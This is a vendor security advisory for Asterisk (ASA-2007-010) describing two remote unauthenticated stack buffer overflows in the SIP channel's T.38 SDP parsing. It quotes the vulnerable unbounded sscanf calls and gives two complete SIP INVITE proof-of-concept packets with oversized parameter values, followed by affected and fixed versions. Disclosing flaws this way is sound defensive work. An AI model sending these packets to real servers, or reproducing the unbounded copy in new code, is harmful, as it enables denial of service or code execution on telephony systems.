<<< Date Index >>>     <<< Thread Index >>>

ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code



>                Asterisk Project Security Advisory - ASA-2007-010
> 
>    +------------------------------------------------------------------------+
>    |      Product       | Asterisk                                          |
>    |--------------------+---------------------------------------------------|
>    |      Summary       | Two stack buffer overflows in SIP channel's T.38  |
>    |                    | SDP parsing code                                  |
>    |--------------------+---------------------------------------------------|
>    | Nature of Advisory | Exploitable Stack Buffer Overflow                 |
>    |--------------------+---------------------------------------------------|
>    |   Susceptibility   | Remote Unauthenticated Sessions                   |
>    |--------------------+---------------------------------------------------|
>    |      Severity      | Moderate                                          |
>    |--------------------+---------------------------------------------------|
>    |   Exploits Known   | No                                                |
>    |--------------------+---------------------------------------------------|
>    |    Reported On     | March 22, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |    Reported By     | Barrie Dempster, NGS Software,                    |
>    |                    | <barrie@xxxxxxxxxxxxxxx>                          |
>    |--------------------+---------------------------------------------------|
>    |     Posted On      | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Last Updated On   | April 24, 2007                                    |
>    |--------------------+---------------------------------------------------|
>    |  Advisory Contact  | kpfleming@xxxxxxxxxx                              |
>    +------------------------------------------------------------------------+
> 
> +------------------------------------------------------------------------------------+
> |Description|Two closely related stack based buffer overflows exist in the 
> SIP/SDP   |
> |           |handler of Asterisk, the vulnerabilities are very similar but 
> exist as  |
> |           |two separate unsafe function calls. The T38FaxRateManagement and 
>        |
> |           |T38FaxUdpEC SDP parameters can be exploited remotely leading to  
>        |
> |           |arbitrary code execution without authentication. In order for 
> these     |
> |           |overflows to occur, t38 fax over SIP must be enabled in 
> sip.conf.       |
> |           |Examples of SIP INVITE packets are shown below, however these    
>        |
> |           |vulnerabilities can be triggered with a number of different SIP 
> messages|
> |           |affecting calls received by Asterisk, or in response to calls 
> made by   |
> |           |Asterisk.                                                        
>        |
> |           |                                                                 
>        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP        
>        |
> |           |T38FaxRateManagement parameter                                   
>        |
> |           |                                                                 
>        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP 
> handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes 
> an overly|
> |           |long T38 parameter it is possible to overflow a stack based 
> buffer and  |
> |           |execute arbitrary code.                                          
>        |
> |           |                                                                 
>        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the  
>        |
> |           |following vulnerable call to sscanf.                             
>        |
> |           |                                                                 
>        |
> |           |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {       
>        |
> |           |                                                                 
>        |
> |           |found = 1;                                                       
>        |
> |           |                                                                 
>        |
> |           |if (option_debug > 2)                                            
>        |
> |           |                                                                 
>        |
> |           |ast_log(LOG_DEBUG, "RateMangement: %s\n", s);                    
>        |
> |           |                                                                 
>        |
> |           |if (!strcasecmp(s, "localTCF"))                                  
>        |
> |           |                                                                 
>        |
> |           |peert38capability |=                                             
>        |
> |           |                                                                 
>        |
> |           |T38FAX_RATE_MANAGEMENT_LOCAL_TCF;                                
>        |
> |           |                                                                 
>        |
> |           |else if (!strcasecmp(s, "transferredTCF"))                       
>        |
> |           |                                                                 
>        |
> |           |peert38capability |=                                             
>        |
> |           |                                                                 
>        |
> |           |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;                           
>        |
> |           |                                                                 
>        |
> |           |This attempts to read the "T38FaxRateManagement:" option from 
> the SDP   |
> |           |within a SIP packet and copy the succeeding string into "s". 
> There are  |
> |           |no checks on the length of this string and we can therefore 
> write past  |
> |           |the boundaries of the "s" variable overwriting adjacent memory 
> on the   |
> |           |stack. "s" is defined earlier in this function as being a 
> character     |
> |           |array of only 256 bytes. The following example packet 
> demonstrates an   |
> |           |overflow of this parameter:                                      
>        |
> |           |                                                                 
>        |
> |           |INVITE sip:200@xxxxxxxxx SIP/2.0                                 
>        |
> |           |                                                                 
>        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                               
>        |
> |           |                                                                 
>        |
> |           |CSeq: 1 INVITE                                                   
>        |
> |           |                                                                 
>        |
> |           |Via: SIP/2.0/UDP                                                 
>        |
> |           |                                                                 
>        |
> |           
> |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                 
>        |
> |           |User-Agent: NGS/2.0                                              
>        |
> |           |                                                                 
>        |
> |           |From: "Barrie Dempster"                                          
>        |
> |           |                                                                 
>        |
> |           
> |<sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                 
>        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades           
>        |
> |           |                                                                 
>        |
> |           |To: <sip:200@localhost>                                          
>        |
> |           |                                                                 
>        |
> |           |Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>               
>        |
> |           |                                                                 
>        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE        
>        |
> |           |                                                                 
>        |
> |           |Content-Type: application/sdp                                    
>        |
> |           |                                                                 
>        |
> |           |Content-Length: 796                                              
>        |
> |           |                                                                 
>        |
> |           |Max-Forwards: 70                                                 
>        |
> |           |                                                                 
>        |
> |           |v=0                                                              
>        |
> |           |                                                                 
>        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1    
>        |
> |           |                                                                 
>        |
> |           |s=-                                                              
>        |
> |           |                                                                 
>        |
> |           |c=IN IP4 127.0.0.1                                               
>        |
> |           |                                                                 
>        |
> |           |t=0 0                                                            
>        |
> |           |                                                                 
>        |
> |           |m=image 5004 UDPTL t38                                           
>        |
> |           |                                                                 
>        |
> |           |a=T38FaxVersion:0                                                
>        |
> |           |                                                                 
>        |
> |           |a=T38MaxBitRate:14400                                            
>        |
> |           |                                                                 
>        |
> |           |a=T38FaxMaxBuffer:1024                                           
>        |
> |           |                                                                 
>        |
> |           |a=T38FaxMaxDatagram:238                                          
>        |
> |           |                                                                 
>        |
> |           
> |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA     |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAA                                                 
>        |
> |           |                                                                 
>        |
> |           |a=T38FaxUdpEC:t38UDPRedundancy                                   
>        |
> |           |                                                                 
>        |
> |           |-------------------------------------------------                
>        |
> |           |                                                                 
>        |
> |           |Remote Unauthenticated stack overflow in Asterisk SIP/SDP 
> T38FaxUdpEC   |
> |           |parameter                                                        
>        |
> |           |                                                                 
>        |
> |           |A remote unauthenticated stack overflow exists in the SIP/SDP 
> handler of|
> |           |Asterisk. By sending a SIP packet with SDP data which includes 
> an overly|
> |           |long T38FaxUdpEC parameter it is possible to overflow a stack 
> based     |
> |           |buffer and execute arbitrary code.                               
>        |
> |           |                                                                 
>        |
> |           |The process_sdp function of chan_sip.c in Asterisk contains the  
>        |
> |           |following vulnerable call to sscanf.                             
>        |
> |           |                                                                 
>        |
> |           |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {                
>        |
> |           |                                                                 
>        |
> |           |found = 1;                                                       
>        |
> |           |                                                                 
>        |
> |           |if (option_debug > 2)                                            
>        |
> |           |                                                                 
>        |
> |           |ast_log(LOG_DEBUG, "UDP EC: %s\n", s);                           
>        |
> |           |                                                                 
>        |
> |           |if (!strcasecmp(s, "t38UDPRedundancy")) {                        
>        |
> |           |                                                                 
>        |
> |           |peert38capability |=                                             
>        |
> |           |                                                                 
>        |
> |           |T38FAX_UDP_EC_REDUNDANCY;                                        
>        |
> |           |                                                                 
>        |
> |           |ast_udptl_set_error_correction_scheme(p->udptl,                  
>        |
> |           |                                                                 
>        |
> |           |UDPTL_ERROR_CORRECTION_REDUNDANCY);                              
>        |
> |           |                                                                 
>        |
> |           |This attempts to read the "T38FaxUdpEC:" option from the SDP 
> within a   |
> |           |SIP packet and copy the succeeding string into "s". There are no 
> checks |
> |           |on the length of this string and we can therefore write past the 
>        |
> |           |boundaries of the "s" variable overwriting adjacent memory on 
> the stack.|
> |           |"s" is defined earlier in this function as being a character 
> array of   |
> |           |only 256 bytes. The following example packet demonstrates an 
> overflow of|
> |           |this parameter:                                                  
>        |
> |           |                                                                 
>        |
> |           |INVITE sip:200@xxxxxxxxx SIP/2.0                                 
>        |
> |           |                                                                 
>        |
> |           |Date: Wed, 21 Mar 2007 4:20:09 GMT                               
>        |
> |           |                                                                 
>        |
> |           |CSeq: 1 INVITE                                                   
>        |
> |           |                                                                 
>        |
> |           |Via: SIP/2.0/UDP                                                 
>        |
> |           |                                                                 
>        |
> |           
> |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> |           |                                                                 
>        |
> |           |User-Agent: NGS/2.0                                              
>        |
> |           |                                                                 
>        |
> |           |From: "Barrie Dempster"                                          
>        |
> |           |                                                                 
>        |
> |           
> |<sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672    |
> |           |                                                                 
>        |
> |           |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades           
>        |
> |           |                                                                 
>        |
> |           |To: <sip:200@localhost>                                          
>        |
> |           |                                                                 
>        |
> |           |Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>               
>        |
> |           |                                                                 
>        |
> |           |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE        
>        |
> |           |                                                                 
>        |
> |           |Content-Type: application/sdp                                    
>        |
> |           |                                                                 
>        |
> |           |Content-Length: 796                                              
>        |
> |           |                                                                 
>        |
> |           |Max-Forwards: 70                                                 
>        |
> |           |                                                                 
>        |
> |           |v=0                                                              
>        |
> |           |                                                                 
>        |
> |           |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1    
>        |
> |           |                                                                 
>        |
> |           |s=-                                                              
>        |
> |           |                                                                 
>        |
> |           |c=IN IP4 127.0.0.1                                               
>        |
> |           |                                                                 
>        |
> |           |t=0 0                                                            
>        |
> |           |                                                                 
>        |
> |           |m=image 5004 UDPTL t38                                           
>        |
> |           |                                                                 
>        |
> |           |a=T38FaxVersion:0                                                
>        |
> |           |                                                                 
>        |
> |           |a=T38MaxBitRate:14400                                            
>        |
> |           |                                                                 
>        |
> |           |a=T38FaxMaxBuffer:1024                                           
>        |
> |           |                                                                 
>        |
> |           |a=T38FaxMaxDatagram:238                                          
>        |
> |           |                                                                 
>        |
> |           
> |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA       |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
>        |
> |           |                                                                 
>        |
> |           |AAAAAAAAA                                                        
>        |
> +------------------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Resolution | T.38 support in the affected versions of Asterisk is not  |
>    |            | enabled by default, therefore the severity of this issue  |
>    |            | is 'moderate'.                                            |
>    |            |                                                           |
>    |            | Users who are using the default configuration with        |
>    |            | 't38_udptl' set to 'no' or an equivalent value are not    |
>    |            | susceptible to this vulnerability. Users who have set     |
>    |            | this configuration item to 'yes' or an equivalent value   |
>    |            | but are not actually using T.38 support can set it to     |
>    |            | 'no' to secure their systems against this vulnerability.  |
>    |            |                                                           |
>    |            | All other users are urged to upgrade to the appropriate   |
>    |            | version of their Asterisk product listed in the           |
>    |            | 'Corrected In' section below.                             |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                           Affected Versions                            |
>    |------------------------------------------------------------------------|
>    |           Product            |   Release   |                           |
>    |                              |   Series    |                           |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.0.x    | not affected; does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.2.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |     Asterisk Open Source     |    1.4.x    | all releases prior to     |
>    |                              |             | 1.4.3                     |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    A.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |  Asterisk Business Edition   |    B.x.x    | not affected, does not    |
>    |                              |             | contain T.38 support      |
>    |------------------------------+-------------+---------------------------|
>    |         AsteriskNOW          | pre-release | all releases prior to and |
>    |                              |             | including Beta 5          |
>    |------------------------------+-------------+---------------------------|
>    | Asterisk Appliance Developer |    0.x.x    | all releases prior to     |
>    |             Kit              |             | 0.4.0                     |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |                              Corrected In                              |
>    |------------------------------------------------------------------------|
>    |      Product       |                      Release                      |
>    |--------------------+---------------------------------------------------|
>    |   Asterisk Open    |               1.4.3, available from               |
>    |       Source       |    ftp://ftp.digium.com/pub/telephony/asterisk    |
>    |--------------------+---------------------------------------------------|
>    |    AsteriskNOW     |            Beta 6, when available from            |
>    |                    | http://www.asterisknow.org, Beta 5 users can use  |
>    |                    |   use 'System Update' in the appliance control    |
>    |                    |   panel to update their version of AsteriskNOW    |
>    |--------------------+---------------------------------------------------|
>    | Asterisk Appliance |               0.4.0, available from               |
>    |   Developer Kit    |      ftp://ftp.digium.com/pub/telephony/aadk      |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    |        Links         |                                                 |
>    +------------------------------------------------------------------------+
> 
>    +------------------------------------------------------------------------+
>    | Asterisk Project Security Advisories are posted at                     |
>    | http://www.asterisk.org/security.                                      |
>    |                                                                        |
>    | This document may be superseded by later versions; if so, the latest   |
>    | version will be posted at                                              |
>    | http://www.asterisk.org/files/ASA-2007-010.pdf.                        |
>    +------------------------------------------------------------------------+
> 
>                Asterisk Project Security Advisory - ASA-2007-010
>               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
>   Permission is hereby granted to distribute and publish this advisory in its
>                            original, unaltered form.